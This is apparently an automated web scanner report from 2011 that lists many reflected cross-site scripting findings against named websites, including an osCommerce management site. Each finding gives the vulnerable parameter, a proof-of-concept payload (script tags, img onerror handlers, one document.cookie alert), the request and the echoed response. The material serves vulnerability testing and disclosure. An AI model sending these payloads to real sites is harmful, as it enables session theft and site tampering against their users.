HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:11:09 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="50" maxlength="60" name="SourceDesc" value="ad0ec"><script>alert(1)</script>40e439a7c6095ec33" ID="Text10"> ...[SNIP]...
The value of the StateText request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d0ed"><script>alert(1)</script>cb2b62692953b2e7a was submitted in the StateText parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:10:12 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28212
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="20" maxlength="20" name="StateText" value="7d0ed"><script>alert(1)</script>cb2b62692953b2e7a" ID="Text9"> ...[SNIP]...
The value of the UserName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26a60"><script>alert(1)</script>a47f54a6dcb361cb2 was submitted in the UserName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:09:00 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="25" maxlength="15" name="UserName" value="26a60"><script>alert(1)</script>a47f54a6dcb361cb2"> ...[SNIP]...
The value of the Website request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cbeb"><script>alert(1)</script>7d95377e38fb8dfe9 was submitted in the Website parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:09:12 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28423
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="30" maxlength="80" name="Website" value="9cbeb"><script>alert(1)</script>7d95377e38fb8dfe9" ID="Text7"> ...[SNIP]...
The value of the Zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecea8"><script>alert(1)</script>4622cbfd507228337 was submitted in the Zip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:10:23 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28236
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="10" maxlength="10" name="Zip" value="ecea8"><script>alert(1)</script>4622cbfd507228337"> ...[SNIP]...
The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0a8d"><script>alert(1)</script>379f3fe056866076e was submitted in the key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:06:38 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="hidden" name="key" value="e0a8d"><script>alert(1)</script>379f3fe056866076e"> ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9541'%3balert(1)//ee30cd37f24 was submitted in the t parameter. This input was echoed as e9541';alert(1)//ee30cd37f24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the buyForm3021_optionValue100 request parameter is copied into the HTML document as plain text between tags. The payload f5b6b<img%20src%3da%20onerror%3dalert(1)>5a0874cdcf was submitted in the buyForm3021_optionValue100 parameter. This input was echoed as f5b6b<img src=a onerror=alert(1)>5a0874cdcf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue101 request parameter is copied into the HTML document as plain text between tags. The payload a3ac9<img%20src%3da%20onerror%3dalert(1)>ca9319cd559 was submitted in the buyForm3021_optionValue101 parameter. This input was echoed as a3ac9<img src=a onerror=alert(1)>ca9319cd559 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue102 request parameter is copied into the HTML document as plain text between tags. The payload 5b2b4<img%20src%3da%20onerror%3dalert(1)>2dae0cf4193 was submitted in the buyForm3021_optionValue102 parameter. This input was echoed as 5b2b4<img src=a onerror=alert(1)>2dae0cf4193 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue103 request parameter is copied into the HTML document as plain text between tags. The payload 1d394<img%20src%3da%20onerror%3dalert(1)>839fc1af98d was submitted in the buyForm3021_optionValue103 parameter. This input was echoed as 1d394<img src=a onerror=alert(1)>839fc1af98d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue104 request parameter is copied into the HTML document as plain text between tags. The payload e956a<img%20src%3da%20onerror%3dalert(1)>961ffc32d71 was submitted in the buyForm3021_optionValue104 parameter. This input was echoed as e956a<img src=a onerror=alert(1)>961ffc32d71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue234 request parameter is copied into the HTML document as plain text between tags. The payload 20625<img%20src%3da%20onerror%3dalert(1)>ec7ca72f201 was submitted in the buyForm3021_optionValue234 parameter. This input was echoed as 20625<img src=a onerror=alert(1)>ec7ca72f201 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue89 request parameter is copied into the HTML document as plain text between tags. The payload b535d<img%20src%3da%20onerror%3dalert(1)>da236fdb197 was submitted in the buyForm3021_optionValue89 parameter. This input was echoed as b535d<img src=a onerror=alert(1)>da236fdb197 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue90 request parameter is copied into the HTML document as plain text between tags. The payload c4005<img%20src%3da%20onerror%3dalert(1)>d2da79f8cd3 was submitted in the buyForm3021_optionValue90 parameter. This input was echoed as c4005<img src=a onerror=alert(1)>d2da79f8cd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue91 request parameter is copied into the HTML document as plain text between tags. The payload 25a69<img%20src%3da%20onerror%3dalert(1)>60e211932b3 was submitted in the buyForm3021_optionValue91 parameter. This input was echoed as 25a69<img src=a onerror=alert(1)>60e211932b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue92 request parameter is copied into the HTML document as plain text between tags. The payload a35d0<img%20src%3da%20onerror%3dalert(1)>63093daffc2 was submitted in the buyForm3021_optionValue92 parameter. This input was echoed as a35d0<img src=a onerror=alert(1)>63093daffc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue93 request parameter is copied into the HTML document as plain text between tags. The payload 3ca31<img%20src%3da%20onerror%3dalert(1)>c3f9fe35a94 was submitted in the buyForm3021_optionValue93 parameter. This input was echoed as 3ca31<img src=a onerror=alert(1)>c3f9fe35a94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue94 request parameter is copied into the HTML document as plain text between tags. The payload bd121<img%20src%3da%20onerror%3dalert(1)>dd999491e54 was submitted in the buyForm3021_optionValue94 parameter. This input was echoed as bd121<img src=a onerror=alert(1)>dd999491e54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue95 request parameter is copied into the HTML document as plain text between tags. The payload 8e184<img%20src%3da%20onerror%3dalert(1)>d5082daa7fd was submitted in the buyForm3021_optionValue95 parameter. This input was echoed as 8e184<img src=a onerror=alert(1)>d5082daa7fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue96 request parameter is copied into the HTML document as plain text between tags. The payload 40ff1<img%20src%3da%20onerror%3dalert(1)>6c082eb0082 was submitted in the buyForm3021_optionValue96 parameter. This input was echoed as 40ff1<img src=a onerror=alert(1)>6c082eb0082 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue97 request parameter is copied into the HTML document as plain text between tags. The payload 2fbf5<img%20src%3da%20onerror%3dalert(1)>38934e0c95b was submitted in the buyForm3021_optionValue97 parameter. This input was echoed as 2fbf5<img src=a onerror=alert(1)>38934e0c95b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue98 request parameter is copied into the HTML document as plain text between tags. The payload 61958<img%20src%3da%20onerror%3dalert(1)>7a7fc952497 was submitted in the buyForm3021_optionValue98 parameter. This input was echoed as 61958<img src=a onerror=alert(1)>7a7fc952497 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue99 request parameter is copied into the HTML document as plain text between tags. The payload 3a9b7<img%20src%3da%20onerror%3dalert(1)>d450c3292d7 was submitted in the buyForm3021_optionValue99 parameter. This input was echoed as 3a9b7<img src=a onerror=alert(1)>d450c3292d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 598c4<img%20src%3da%20onerror%3dalert(1)>01f6b76535b6cd0b was submitted in the id parameter. This input was echoed as 598c4<img src=a onerror=alert(1)>01f6b76535b6cd0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 500 Element buyForm3021598c4<img src=a onerror=alert(1)>01f6b76535b6cd0b_productId is undefined in a Java object of type class coldfusion.filter.FormScope. Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:24:33 GMT;path=/ X-Powered-By: ASP.NET Date: Sun, 15 May 2011 14:24:32 GMT Content-Length: 12421
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> Element buyForm3021598c4<img src=a onerror=alert(1)>01f6b76535b6cd0b_productId is undefined in a Java object of type class coldfusion.filter.FormScope. </h1> ...[SNIP]...
The value of the 8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c271"><script>alert(1)</script>733e64ec1b7 was submitted in the 8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr ...[SNIP]... rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d=14c271"><script>alert(1)</script>733e64ec1b7')+'&langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))"> ...[SNIP]...
3.102. http://www.oscommerce-manager.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.oscommerce-manager.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b64d"><script>alert(1)</script>d053e3a864d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8b64d"><script>alert(1)</script>d053e3a864d=1 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19855"><script>alert(1)</script>f81842b4bda was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18ab2"><script>alert(1)</script>c8a9382be42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec796"><script>alert(1)</script>4cd7466cee6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c1a2"><script>alert(1)</script>0adfa5fb7d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baba7"><script>alert(1)</script>59e7569ef6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7b6a"><script>alert(1)</script>5e71549a0f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3277"><script>alert(1)</script>b21edc70c0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ed16"><script>alert(1)</script>f7f860cf0a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57413"><script>alert(1)</script>61f1851e1b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68db8"><script>alert(1)</script>45158dab790 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995f5"><script>alert(1)</script>a0c6474d956 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ebfc"><script>alert(1)</script>470968f84d8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d98c"><script>alert(1)</script>b4b89e17f6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8db62"><script>alert(1)</script>404afc2e942 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98755"><script>alert(1)</script>756dc892b26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4d1e"><script>alert(1)</script>568ef29fa29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8b60"><script>alert(1)</script>c46cf9ef0fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78a30"><script>alert(1)</script>484cc22110d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19527"><script>alert(1)</script>66a5488c9ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17f01"><script>alert(1)</script>dcd70175ca0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb10a"><script>alert(1)</script>71a3c70d3e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 761d0"><script>alert(1)</script>1b47fb348be was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77c9e"><script>alert(1)</script>f530f647a18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5d83"><script>alert(1)</script>a9586df36a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6363"><script>alert(1)</script>1aac51cff8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ce5"><script>alert(1)</script>83eb18f0444 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d90cd"><script>alert(1)</script>3c6d67d4f10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b61e"><script>alert(1)</script>9ae9ad7a90d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c7e"><script>alert(1)</script>c193572c9b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e838b"><script>alert(1)</script>c7a2b0b1109 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 810c9"><script>alert(1)</script>4c29409ea48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6ffe"><script>alert(1)</script>cc6210ba8e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca473"><script>alert(1)</script>135982207b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83d27"><script>alert(1)</script>90d976281d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d97c4"><script>alert(1)</script>d3f5fc0f678 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6930"><script>alert(1)</script>e13ba40e060 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57d41"><script>alert(1)</script>0b40349dd1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f90fb"><script>alert(1)</script>1ea0e7a080 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10c53"><script>alert(1)</script>92c043d2bd7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82d9d"><script>alert(1)</script>3ff12a53a87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3fba"><script>alert(1)</script>c22da2ed4f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5d7f"><script>alert(1)</script>18ea0726c9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 105cb"><script>alert(1)</script>5dd21cebd5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f76f"><script>alert(1)</script>fb7b171dc58 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a461"><script>alert(1)</script>646e21d0eab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e42"><script>alert(1)</script>6c47226d429 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.149. http://www.oscommerce-manager.com/order [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.oscommerce-manager.com
Path: /order
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bc1b"><script>alert(1)</script>4491b6523c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
